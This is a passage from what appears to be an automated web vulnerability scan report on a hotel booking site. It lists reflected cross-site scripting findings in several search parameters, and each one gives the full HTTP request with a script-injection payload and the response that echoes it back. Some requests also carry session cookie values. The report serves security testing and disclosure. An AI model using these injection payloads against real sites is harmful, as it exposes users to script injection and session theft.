=2011-10-07&%24aucnt=0&%24pid=c3919e40-e5b8-49f8-b876-4fed1f31968f&%24sid=bfa7dd53-c988-458c-86df-52443affccb8&adunit=d5332d31-d5c8-59f8-c876-4fee1f31712a&
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 03 Oct 2011 00:12:43 GMT
Content-Type: text/html; charset=UTF-8
Server: Microsoft-IIS/6.0
P3P: CP='NOI DSP COR LAW NID CUR ADMa OUR DELa IND PHY ONL UNI PUR COM NAV STA'
Set-Cookie: LANGUAGE=1;path=/
Set-Cookie: SOURCECODE=IGoUGo;expires=Sat, 31-Mar-2012 00:12:43 GMT;path=/
Vary: Accept-Encoding
Content-Length: 228301


<style type="text/css">
<!--
#waitScreen
{
position: absolute;
left:0pt;
visibility: hidden;
height:100%;
width:100%
}
.Default
{
   FONT-WEIGHT: normal;
   FONT-SIZE: 11px;
   FONT-S
...[SNIP]...
<a href="/" onmouseout="addthis_close()" onclick="return addthis_open(this, '', 'http://www.hotelplanner.com/Search/Index.cfm?City=Boston&InDate=10/04/2011&OutDate=10/07/2011&NumRooms=1&adults=1d0c52"><script>alert(1)</script>4bf2e57ade7&State=Massachusetts&Country=United%20States&sc=IGoUGo', 'HotelPlanner.com Group Hotel Rates & Group Travel')">
...[SNIP]...
4.264. http://www.hotelplanner.com/Search/Index.cfm [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.hotelplanner.com
Path:   /Search/Index.cfm

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 14e5a"><script>alert(1)</script>8b5edb22f8 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /Search/Index.cfm?City=Boston&InDate=10/04/2011&OutDate=10/07/2011&NumRooms=1&adults=1&State=Massachusetts&Country=United%20States&sc=IGoUGo&14e5a"><script>alert(1)</script>8b5edb22f8=1 HTTP/1.1
Host: www.hotelplanner.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://drf-global.com/servicegateway/globaltrips-shopping-svcs/drfadserver-1.0/pub/rf?lob=HOTEL&advertiserName=hotelplanner&grp=9701&placeholderUrl=http%3A%2F%2Fwww.travelocity.com%2Fvstrack%3FWA1%3D03020%26WA3%3D742%26WA5%3DDRFContinue%26WA6%3Dair%26dst%3Durl_placeholder&url=http%3A%2F%2Fwww.hotelplanner.com%2FSearch%2FIndex.cfm%3FCity%3D%24%7Bcity%7D%26InDate%3D%24%7BdepartureDate%3Ad%3A%22mm%2Fdd%2Fyyyy%22%7D%26OutDate%3D%24%7BreturnDate%3Ad%3A%22mm%2Fdd%2Fyyyy%22%7D%26NumRooms%3D%24%7Brooms%7D%26adults%3D%24%7Badults%7D%26State%3D%24%7Bstaten%7D%26Country%3D%24%7Bcountryn%7D%26sc%3DIGoUGo&pid=c3919e40-e5b8-49f8-b876-4fed1f31968f&sid=bfa7dd53-c988-458c-86df-52443affccb8&uid=20d9c1fc-61a4-45f0-9524-380e68994c01&widget=H_PopUnder&pti=default&src=none&ppi=4a15630f-e16d-42c4-95d2-0852b73fdd75&ctx=92aa9504-b6eb-4091-8b93-6582f63d9555&ccn=1&cgn=149&pos=5&aii=41baf401-e791-4c75-8143-e95891286e0a&%24cc=US&%24rc=US&%24adults=1&%24destination=Boston%2C%20MA%20Massachusetts&%24glsId=440663&%24city=Boston&%24countryn=United%20States&%24countryc=US&%24staten=Massachusetts&%24statec=MA&%24lob=HOTEL&%24rooms=1&%24context=92aa9504-b6eb-4091-8b93-6582f63d9555&%24widget=H_PopUnder&%24l=9&%24departureDate=2011-10-04&%24returnDate=2011-10-07&%24aucnt=0&%24pid=c3919e40-e5b8-49f8-b876-4fed1f31968f&%24sid=bfa7dd53-c988-458c-86df-52443affccb8&adunit=d5332d31-d5c8-59f8-c876-4fee1f31712a&
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 03 Oct 2011 00:13:31 GMT
Content-Type: text/html; charset=UTF-8
Server: Microsoft-IIS/6.0
P3P: CP='NOI DSP COR LAW NID CUR ADMa OUR DELa IND PHY ONL UNI PUR COM NAV STA'
Set-Cookie: LANGUAGE=1;path=/
Set-Cookie: SOURCECODE=IGoUGo;expires=Sat, 31-Mar-2012 00:13:31 GMT;path=/
Vary: Accept-Encoding
Content-Length: 228455


<style type="text/css">
<!--
#waitScreen
{
position: absolute;
left:0pt;
visibility: hidden;
height:100%;
width:100%
}
.Default
{
   FONT-WEIGHT: normal;
   FONT-SIZE: 11px;
   FONT-S
...[SNIP]...
="return addthis_open(this, '', 'http://www.hotelplanner.com/Search/Index.cfm?City=Boston&InDate=10/04/2011&OutDate=10/07/2011&NumRooms=1&adults=1&State=Massachusetts&Country=United%20States&sc=IGoUGo&14e5a"><script>alert(1)</script>8b5edb22f8=1', 'HotelPlanner.com Group Hotel Rates & Group Travel')">
...[SNIP]...
4.265. http://www.hotelplanner.com/Search/Index.cfm [sc parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.hotelplanner.com
Path:   /Search/Index.cfm

Issue detail

The value of the sc request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 50051"><script>alert(1)</script>39edeb187e was submitted in the sc parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /Search/Index.cfm?City=Boston&InDate=10/04/2011&OutDate=10/07/2011&NumRooms=1&adults=1&State=Massachusetts&Country=United%20States&sc=IGoUGo50051"><script>alert(1)</script>39edeb187e HTTP/1.1
Host: www.hotelplanner.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://drf-global.com/servicegateway/globaltrips-shopping-svcs/drfadserver-1.0/pub/rf?lob=HOTEL&advertiserName=hotelplanner&grp=9701&placeholderUrl=http%3A%2F%2Fwww.travelocity.com%2Fvstrack%3FWA1%3D03020%26WA3%3D742%26WA5%3DDRFContinue%26WA6%3Dair%26dst%3Durl_placeholder&url=http%3A%2F%2Fwww.hotelplanner.com%2FSearch%2FIndex.cfm%3FCity%3D%24%7Bcity%7D%26InDate%3D%24%7BdepartureDate%3Ad%3A%22mm%2Fdd%2Fyyyy%22%7D%26OutDate%3D%24%7BreturnDate%3Ad%3A%22mm%2Fdd%2Fyyyy%22%7D%26NumRooms%3D%24%7Brooms%7D%26adults%3D%24%7Badults%7D%26State%3D%24%7Bstaten%7D%26Country%3D%24%7Bcountryn%7D%26sc%3DIGoUGo&pid=c3919e40-e5b8-49f8-b876-4fed1f31968f&sid=bfa7dd53-c988-458c-86df-52443affccb8&uid=20d9c1fc-61a4-45f0-9524-380e68994c01&widget=H_PopUnder&pti=default&src=none&ppi=4a15630f-e16d-42c4-95d2-0852b73fdd75&ctx=92aa9504-b6eb-4091-8b93-6582f63d9555&ccn=1&cgn=149&pos=5&aii=41baf401-e791-4c75-8143-e95891286e0a&%24cc=US&%24rc=US&%24adults=1&%24destination=Boston%2C%20MA%20Massachusetts&%24glsId=440663&%24city=Boston&%24countryn=United%20States&%24countryc=US&%24staten=Massachusetts&%24statec=MA&%24lob=HOTEL&%24rooms=1&%24context=92aa9504-b6eb-4091-8b93-6582f63d9555&%24widget=H_PopUnder&%24l=9&%24departureDate=2011-10-04&%24returnDate=2011-10-07&%24aucnt=0&%24pid=c3919e40-e5b8-49f8-b876-4fed1f31968f&%24sid=bfa7dd53-c988-458c-86df-52443affccb8&adunit=d5332d31-d5c8-59f8-c876-4fee1f31712a&
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 03 Oct 2011 00:13:16 GMT
Content-Type: text/html; charset=UTF-8
Server: Microsoft-IIS/6.0
P3P: CP='NOI DSP COR LAW NID CUR ADMa OUR DELa IND PHY ONL UNI PUR COM NAV STA'
Set-Cookie: LANGUAGE=1;path=/
Set-Cookie: SOURCECODE=IGoUGo50051%22%3E%3Cscript%3Ealert%281%29%3C%2Fscript%3E39edeb187e;expires=Sat, 31-Mar-2012 00:13:16 GMT;path=/
Vary: Accept-Encoding
Content-Length: 228230


<style type="text/css">
<!--
#waitScreen
{
position: absolute;
left:0pt;
visibility: hidden;
height:100%;
width:100%
}
.Default
{
   FONT-WEIGHT: normal;
   FONT-SIZE: 11px;
   FONT-S
...[SNIP]...
k="return addthis_open(this, '', 'http://www.hotelplanner.com/Search/Index.cfm?City=Boston&InDate=10/04/2011&OutDate=10/07/2011&NumRooms=1&adults=1&State=Massachusetts&Country=United%20States&sc=IGoUGo50051"><script>alert(1)</script>39edeb187e', 'HotelPlanner.com Group Hotel Rates & Group Travel')">
...[SNIP]...
4.266. http://www.hotelplanner.com/Search/index.cfm [HotelName parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.hotelplanner.com
Path:   /Search/index.cfm

Issue detail

The value of the HotelName request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 3fa49"><script>alert(1)</script>5eb5ba7635c was submitted in the HotelName parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /Search/index.cfm?City=Boston%2C+MA&InDate=10%2F4%2F2011&OutDate=10%2F7%2F2011&NumRooms=1&ViewType=List&HotelName=3fa49"><script>alert(1)</script>5eb5ba7635c&Rating=&PriceMin=1&PriceMax=9999&btnGo.x=113&btnGo.y=15 HTTP/1.1
Host: www.hotelplanner.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.hotelplanner.com/Search/Index.cfm?City=Boston&InDate=10/04/2011&OutDate=10/07/2011&NumRooms=1&adults=1&State=Massachusetts&Country=United%20States&sc=IGoUGo
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CFID=63063151; CFTOKEN=b435e7611cfab07e-C71CEF9A-1372-5005-24C466871C472C41; LOCALE=en%5FUS; CURRENCY=USD; SOURCECODE=IGoUGo; TLTSID=F123A950ED5310ED160FDD8181683406; TLTUID=F123A950ED5310ED160FDD8181683406; TRAFFICID=15786488; LANGUAGE=1; SCREENWIDTH=1920; SCREENHEIGHT=1200; __utma=69973641.2138588342.1317600610.1317600610.1317600610.1; __utmb=69973641.1.10.1317600610; __utmc=69973641; __utmz=69973641.1317600610.1.1.utmcsr=drf-global.com|utmccn=(referral)|utmcmd=referral|utmcct=/servicegateway/globaltrips-shopping-svcs/drfadserver-1.0/pub/rf

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 03 Oct 2011 00:22:43 GMT
Content-Type: text/html; charset=UTF-8
Server: Microsoft-IIS/6.0
P3P: CP='NOI DSP COR LAW NID CUR ADMa OUR DELa IND PHY ONL UNI PUR COM NAV STA'
Set-Cookie: LANGUAGE=1;path=/
Vary: Accept-Encoding
Content-Length: 118577


<style type="text/css">
<!--
#waitScreen
{
position: absolute;
left:0pt;
visibility: hidden;
height:100%;
width:100%
}
.Default
{
   FONT-WEIGHT: normal;
   FONT-SIZE: 11px;
   FONT-S
...[SNIP]...
t="addthis_close()" onclick="return addthis_open(this, '', 'http://www.hotelplanner.com/Search/index.cfm?City=Boston%2C+MA&InDate=10%2F4%2F2011&OutDate=10%2F7%2F2011&NumRooms=1&ViewType=List&HotelName=3fa49"><script>alert(1)</script>5eb5ba7635c&Rating=&PriceMin=1&PriceMax=9999&btnGo.x=113&btnGo.y=15', 'HotelPlanner.com Group Hotel Rates & Group Travel')">
...[SNIP]...
4.267. http://www.hotelplanner.com/Search/index.cfm [NumRooms parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.hotelplanner.com
Path:   /Search/index.cfm

Issue detail

The value of the NumRooms request parameter is copied into the HTML document as plain text between tags. The payload 919fb<script>alert(1)</script>49f0b73eca3 was submitted in the NumRooms parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Request

GET /Search/index.cfm?City=Boston%2C+MA&InDate=10%2F4%2F2011&OutDate=10%2F7%2F2011&NumRooms=919fb<script>alert(1)</script>49f0b73eca3&ViewType=List&HotelName=&Rating=&PriceMin=1&PriceMax=9999&btnGo.x=113&btnGo.y=15 HTTP/1.1
Host: www.hotelplanner.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.hotelplanner.com/Search/Index.cfm?City=Boston&InDate=10/04/2011&OutDate=10/07/2011&NumRooms=1&adults=1&State=Massachusetts&Country=United%20States&sc=IGoUGo
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CFID=63063151; CFTOKEN=b435e7611cfab07e-C71CEF9A-1372-5005-24C466871C472C41; LOCALE=en%5FUS; CURRENCY=USD; SOURCECODE=IGoUGo; TLTSID=F123A950ED5310ED160FDD8181683406; TLTUID=F123A950ED5310ED160FDD8181683406; TRAFFICID=15786488; LANGUAGE=1; SCREENWIDTH=1920; SCREENHEIGHT=1200; __utma=69973641.2138588342.1317600610.1317600610.1317600610.1; __utmb=69973641.1.10.1317600610; __utmc=69973641; __utmz=69973641.1317600610.1.1.utmcsr=drf-global.com|utmccn=(referral)|utmcmd=referral|utmcct=/servicegateway/globaltrips-shopping-svcs/drfadserver-1.0/pub/rf

Response (redirected)

HTTP/1.1 200 OK
Connection: close
Date: Mon, 03 Oct 2011 00:22:35 GMT
Content-Type: text/html; charset=UTF-8
Server: Microsoft-IIS/6.0
P3P: CP='NOI DSP COR LAW NID CUR ADMa OUR DELa IND PHY ONL UNI PUR COM NAV STA'
Set-Cookie: LANGUAGE=1;path=/
Vary: Accept-Encoding
Content-Length: 74239

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">
   <html>
       <head>
       <title>Boston, MA Group Hotels - Discount Group Travel Hotel Rates + Reservations</title>
       <meta http-equiv="Con
...[SNIP]...
<strong>Check instant online group rates for 919fb<script>alert(1)</script>49f0b73eca3 rooms</strong>
...[SNIP]...
4.268. http://www.hotelplanner.com/Search/index.cfm [PriceMax parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.hotelplanner.com
Path:   /Search/index.cfm

Issue detail

The value of the PriceMax request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 37d6b"><script>alert(1)</script>cd6e8673d05 was submitted in the PriceMax parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /Search/index.cfm?City=Boston%2C+MA&InDate=10%2F4%2F2011&OutDate=10%2F7%2F2011&NumRooms=1&ViewType=List&HotelName=&Rating=&PriceMin=1&PriceMax=999937d6b"><script>alert(1)</script>cd6e8673d05&btnGo.x=113&btnGo.y=15 HTTP/1.1
Host: www.hotelplanner.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.hotelplanner.com/Search/Index.cfm?City=Boston&InDate=10/04/2011&OutDate=10/07/2011&NumRooms=1&adults=1&State=Massachusetts&Country=United%20States&sc=IGoUGo
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CFID=63063151; CFTOKEN=b435e7611cfab07e-C71CEF9A-1372-5005-24C466871C472C41; LOCALE=en%5FUS; CURRENCY=USD; SOURCECODE=IGoUGo; TLTSID=F123A950ED5310ED160FDD8181683406; TLTUID=F123A950ED5310ED160FDD8181683406; TRAFFICID=15786488; LANGUAGE=1; SCREENWIDTH=1920; SCREENHEIGHT=1200; __utma=69973641.2138588342.1317600610.1317600610.1317600610.1; __utmb=69973641.1.10.1317600610; __utmc=69973641; __utmz=69973641.1317600610.1.1.utmcsr=drf-global.com|utmccn=(referral)|utmcmd=referral|utmcct=/servicegateway/globaltrips-shopping-svcs/drfadserver-1.0/pub/rf

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 03 Oct 2011 00:22:54 GMT
Content-Type: text/html; charset=UTF-8
Server: Microsoft-IIS/6.0
P3P: CP='NOI DSP COR LAW NID CUR ADMa OUR DELa IND PHY ONL UNI PUR COM NAV STA'
Set-Cookie: LANGUAGE=1;path=/
Vary: Accept-Encoding
Content-Length: 230487


<style type="text/css">
<!--
#waitScreen
{
position: absolute;
left:0pt;
visibility: hidden;
height:100%;
width:100%
}
.Default
{
   FONT-WEIGHT: normal;
   FONT-SIZE: 11px;
   FONT-S
...[SNIP]...
rn addthis_open(this, '', 'http://www.hotelplanner.com/Search/index.cfm?City=Boston%2C+MA&InDate=10%2F4%2F2011&OutDate=10%2F7%2F2011&NumRooms=1&ViewType=List&HotelName=&Rating=&PriceMin=1&PriceMax=999937d6b"><script>alert(1)</script>cd6e8673d05&btnGo.x=113&btnGo.y=15', 'HotelPlanner.com Group Hotel Rates & Group Travel')">
...[SNIP]...
4.269. http://www.hotelplanner.com/Search/index.cfm [PriceMin parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.hotelplanner.com
Path:   /Search/index.cfm

Issue detail

The value of the PriceMin request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 41bab"><script>alert(1)</script>67b3aa74a1b was submitted in the PriceMin parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /Search/index.cfm?City=Boston%2C+MA&InDate=10%2F4%2F2011&OutDate=10%2F7%2F2011&NumRooms=1&ViewType=List&HotelName=&Rating=&PriceMin=141bab"><script>alert(1)</script>67b3aa74a1b&PriceMax=9999&btnGo.x=113&btnGo.y=15 HTTP/1.1
Host: www.hotelplanner.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.hotelplanner.com/Search/Index.cfm?City=Boston&InDate=10/04/2011&OutDate=10/07/2011&NumRooms=1&adults=1&State=Massachusetts&Country=United%20States&sc=IGoUGo
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CFID=63063151; CFTOKEN=b435e7611cfab07e-C71CEF9A-1372-5005-24C466871C472C41; LOCALE=en%5FUS; CURRENCY=USD; SOURCECODE=IGoUGo; TLTSID=F123A950ED5310ED160FDD8181683406; TLTUID=F123A950ED5310ED160FDD8181683406; TRAFFICID=15786488; LANGUAGE=1; SCREENWIDTH=1920; SCREENHEIGHT=1200; __utma=69973641.2138588342.1317600610.1317600610.1317600610.1; __utmb=69973641.1.10.1317600610; __utmc=69973641; __utmz=69973641.1317600610.1.1.utmcsr=drf-global.com|utmccn=(referral)|utmcmd=referral|utmcct=/servicegateway/globaltrips-shopping-svcs/drfadserver-1.0/pub/rf

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 03 Oct 2011 00:22:49 GMT
Content-Type: text/html; charset=UTF-8
Server: Microsoft-IIS/6.0
P3P: CP='NOI DSP COR LAW NID CUR ADMa OUR DELa IND PHY ONL UNI PUR COM NAV STA'
Set-Cookie: LANGUAGE=1;path=/
Vary: Accept-Encoding
Content-Length: 230487


<style type="text/css">
<!--
#waitScreen
{
position: absolute;
left:0pt;
visibility: hidden;
height:100%;
width:100%
}
.Default
{
   FONT-WEIGHT: normal;
   FONT-SIZE: 11px;
   FONT-S
...[SNIP]...
onclick="return addthis_open(this, '', 'http://www.hotelplanner.com/Search/index.cfm?City=Boston%2C+MA&InDate=10%2F4%2F2011&OutDate=10%2F7%2F2011&NumRooms=1&ViewType=List&HotelName=&Rating=&PriceMin=141bab"><script>alert(1)</script>67b3aa74a1b&PriceMax=9999&btnGo.x=113&btnGo.y=15', 'HotelPlanner.com Group Hotel Rates & Group Travel')">
...[SNIP]...
4.270. http://www.hotelplanner.com/Search/index.cfm [Rating parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.hotelplanner.com
Path:   /Search/index.cfm

Issue detail

The value of the Rating request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 8ead4"><script>alert(1)</script>4ef82785e9c was submitted in the Rating parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /Search/index.cfm?City=Boston%2C+MA&InDate=10%2F4%2F2011&OutDate=10%2F7%2F2011&NumRooms=1&ViewType=List&HotelName=&Rating=8ead4"><script>alert(1)</script>4ef82785e9c&PriceMin=1&PriceMax=9999&btnGo.x=113&btnGo.y=15 HTTP/1.1
Host: www.hotelplanner.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.hotelplanner.com/Search/Index.cfm?City=Boston&InDate=10/04/2011&OutDate=10/07/2011&NumRooms=1&adults=1&State=Massachusetts&Country=United%20States&sc=IGoUGo
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CFID=63063151; CFTOKEN=b435e7611cfab07e-C71CEF9A-1372-5005-24C466871C472C41; LOCALE=en%5FUS; CURRENCY=USD; SOURCECODE=IGoUGo; TLTSID=F123A950ED5310ED160FDD8181683406; TLTUID=F123A950ED5310ED160FDD8181683406; TRAFFICID=15786488; LANGUAGE=1; SCREENWIDTH=1920; SCREENHEIGHT=1200; __utma=69973641.2138588342.1317600610.1317600610.1317600610.1; __utmb=69973641.1.10.1317600610; __utmc=69973641; __utmz=69973641.1317600610.1.1.utmcsr=drf-global.com|utmccn=(referral)|utmcmd=referral|utmcct=/servicegateway/globaltrips-shopping-svcs/drfadserver-1.0/pub/rf

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 03 Oct 2011 00:22:45 GMT
Content-Type: text/html; charset=UTF-8
Server: Microsoft-IIS/6.0
P3P: CP='NOI DSP COR LAW NID CUR ADMa OUR DELa IND PHY ONL UNI PUR COM NAV STA'
Set-Cookie: LANGUAGE=1;path=/
Vary: Accept-Encoding
Content-Length: 118534


<style type="text/css">
<!--
#waitScreen
{
position: absolute;
left:0pt;
visibility: hidden;
height:100%;
width:100%
}
.Default
{
   FONT-WEIGHT: normal;
   FONT-SIZE: 11px;
   FONT-S
...[SNIP]...
is_close()" onclick="return addthis_open(this, '', 'http://www.hotelplanner.com/Search/index.cfm?City=Boston%2C+MA&InDate=10%2F4%2F2011&OutDate=10%2F7%2F2011&NumRooms=1&ViewType=List&HotelName=&Rating=8ead4"><script>alert(1)</script>4ef82785e9c&PriceMin=1&PriceMax=9999&btnGo.x=113&btnGo.y=15', 'HotelPlanner.com Group Hotel Rates & Group Travel')">
...[SNIP]...
4.271. http://www.hotelplanner.com/Search/index.cfm [ViewType parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.hotelplanner.com
Path:   /Search/index.cfm

Issue detail

The value of the ViewType request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f4c47"><script>alert(1)</script>36f36986939 was submitted in the ViewType parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /Search/index.cfm?City=Boston%2C+MA&InDate=10%2F4%2F2011&OutDate=10%2F7%2F2011&NumRooms=1&ViewType=Listf4c47"><script>alert(1)</script>36f36986939&HotelName=&Rating=&PriceMin=1&PriceMax=9999&btnGo.x=113&btnGo.y=15 HTTP/1.1
Host: www.hotelplanner.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.hotelplanner.com/Search/Index.cfm?City=Boston&InDate=10/04/2011&OutDate=10/07/2011&NumRooms=1&adults=1&State=Massachusetts&Country=United%20States&sc=IGoUGo
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CFID=63063151; CFTOKEN=b435e7611cfab07e-C71CEF9A-1372-5005-24C466871C472C41; LOCALE=en%5FUS; CURRENCY=USD; SOURCECODE=IGoUGo; TLTSID=F123A950ED5310ED160FDD8181683406; TLTUID=F123A950ED5310ED160FDD8181683406; TRAFFICID=15786488; LANGUAGE=1; SCREENWIDTH=1920; SCREENHEIGHT=1200; __utma=69973641.2138588342.1317600610.1317600610.1317600610.1; __utmb=69973641.1.10.1317600610; __utmc=69973641; __utmz=69973641.1317600610.1.1.utmcsr=drf-global.com|utmccn=(referral)|utmcmd=referral|utmcct=/servicegateway/globaltrips-shopping-svcs/drfadserver-1.0/pub/rf

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 03 Oct 2011 00:22:39 GMT
Content-Type: text/html; charset=UTF-8
Server: Microsoft-IIS/6.0
P3P: CP='NOI DSP COR LAW NID CUR ADMa OUR DELa IND PHY ONL UNI PUR COM NAV STA'
Set-Cookie: LANGUAGE=1;path=/
Vary: Accept-Encoding
Content-Length: 155889


<style type="text/css">
<!--
#waitScreen
{
position: absolute;
left:0pt;
visibility: hidden;
height:100%;
width:100%
}
.Default
{
   FONT-WEIGHT: normal;
   FONT-SIZE: 11px;
   FONT-S
...[SNIP]...
" onmouseout="addthis_close()" onclick="return addthis_open(this, '', 'http://www.hotelplanner.com/Search/index.cfm?City=Boston%2C+MA&InDate=10%2F4%2F2011&OutDate=10%2F7%2F2011&NumRooms=1&ViewType=Listf4c47"><script>alert(1)</script>36f36986939&HotelName=&Rating=&PriceMin=1&PriceMax=9999&btnGo.x=113&btnGo.y=15', 'HotelPlanner.com Group Hotel Rates & Group Travel')">
...[SNIP]...
4.272. http://www.hotelplanner.com/Search/index.cfm [btnGo.x parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.hotelplanner.com
Path:   /Search/index.cfm

Issue detail

The value of the btnGo.x request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c7a9e"><script>alert(1)</script>75d130eda71 was submitted in the btnGo.x parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /Search/index.cfm?City=Boston%2C+MA&InDate=10%2F4%2F2011&OutDate=10%2F7%2F2011&NumRooms=1&ViewType=List&HotelName=&Rating=&PriceMin=1&PriceMax=9999&btnGo.x=113c7a9e"><script>alert(1)</script>75d130eda71&btnGo.y=15 HTTP/1.1
Host: www.hotelplanner.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.hotelplanner.com/Search/Index.cfm?City=Boston&InDate=10/04/2011&OutDate=10/07/2011&NumRooms=1&adults=1&State=Massachusetts&Country=United%20States&sc=IGoUGo
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
